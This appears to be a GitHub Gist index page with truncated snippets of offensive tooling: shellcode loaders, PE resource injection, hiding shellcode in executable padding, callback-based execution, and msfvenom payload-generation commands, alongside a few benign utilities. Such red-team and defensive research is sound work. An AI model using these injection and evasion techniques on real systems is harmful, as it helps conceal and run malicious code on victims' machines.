Skip to content

Instantly share code, notes, and snippets.

@Wra7h
Wra7h / CreateThread.m
Last active September 19, 2023 05:19
Matlab Shellcode Loader
% Wra7h/FlavorTown
% MATLAB version: R2023a
% Tested on Win10 x64
if not(libisloaded('kernel32'))
loadlibrary('kernel32.dll', @kernel32proto);
end
if not(libisloaded('msvcrt'))
loadlibrary('msvcrt.dll', @msvcrtproto);
@Wra7h
Wra7h / PEResourceInject.cs
Created October 17, 2022 05:39
PEResourceInject
/*
* PEResourceInject (C# version for x64) by Wra7h
*
* Add a bitmap resource to an executable. Parse the PE header and calculate the address of the shellcode.
* This avoids direct calls to VirtualAllocEx & WriteProcessMemory, but will modify the target exe on disk,
* and this implementation will create a backup of the executable in the same directory with a ".bak" extension.
*
* Compile: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe .\PEResourceInject.cs
* Use: PEResourceInject.exe <C:\Path\to\target\program.exe> <C:\Path\to\shellcode.bin>
*
@Wra7h
Wra7h / Get-ProcessPipes.ps1
Last active November 28, 2024 22:57
Use PowerShell to get the PIDs associated with Named Pipes
function Get-ProcessPipes{
param(
[Parameter(Mandatory=$false)]
[string]$CSV,
[Parameter(Mandatory=$false)]
[switch]$All
)
Add-Type -TypeDefinition @"
using System;
@Wra7h
Wra7h / ARC_Scan.cs
Created April 2, 2022 07:02
Scan processes for any Application Recovery Callbacks
// Scan for any Application Recovery Callbacks on your system. Each Process ID/Callback address combination should only be displayed once.
// Also, it's a continuous loop so it shouldn't die until you're done with it.
// Full PoC here: https://github.com/Wra7h/ARCInject
// Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe .\ARC_Scan.cs
// Execute: .\ARC_Scan.exe
using System;
using System.Collections.Generic;
using System.Diagnostics;
@Wra7h
Wra7h / RecoveryCallbackToShellcode.cs
Created March 25, 2022 09:21
RegisterApplicationRecoveryCallback Shellcode Execution
// IMPORTANT NOTE:
// It seems like when this is compiled with C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, the crash is handled more gracefully than v3.5.
// So you'll have to find another way to cause an _unexpected_ crash to use with v4.0.30319.
//Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe .\RecoveryCallbackToShellcode.cs
//Usage: .\RecoveryCallbackToShellcode.exe <path to shellcode>
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
@Wra7h
Wra7h / BrainPain.cs
Last active May 17, 2022 02:57
Store/Recover/Execute shellcode using *.exe padding
// Some fun with storing shellcode in the padding of executables, rebuilding the shellcode and executing if successfully recovered.
// At least on the executables I've used, the shellcode doesn't seem to prevent the executable from executing as expected.
// Step 1: Compile:
// PS C:\> C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\BrainPain.cs
// Step 2: generate shellcode
// msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -f raw -o calc.bin
// Step 3: Execute Brainpain
@Wra7h
Wra7h / DecompressExecute.cs
Created December 2, 2021 08:04
Decompress shellcode w/ execution
//Decompressing shellcode and execution via callback
//Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\DecompressExecute.cs
//Windows Compression API: https://docs.microsoft.com/en-us/windows/win32/api/_cmpapi/
//Supported Algorithms: https://docs.microsoft.com/en-us/windows/win32/api/compressapi/nf-compressapi-createcompressor
// Step 1: generate shellcode
// Msfvenom: msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -f raw -o calc.bin
// Step 2: Compress the shellcode with my compress.cs gist here: https://gist.github.com/Wra7h/4d56791c2d0b5c1f27a67f3bc0ab924d
// Compression command: .\compress.exe -in C:\path\to\calc.bin -out .\LZMScalc.bin -alg 5
@Wra7h
Wra7h / Compress.cs
Created December 2, 2021 08:00
C# Compression using Windows API
//Compresses a file using the Windows API
//Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\Compress.cs
//Windows Compression API: https://docs.microsoft.com/en-us/windows/win32/api/_cmpapi/
//Supported Algorithms: https://docs.microsoft.com/en-us/windows/win32/api/compressapi/nf-compressapi-createcompressor
// Takes a file, compresses it using one of the supported algorithms and creates a file with the compressed data.
using System;
using System.IO;
using System.Linq;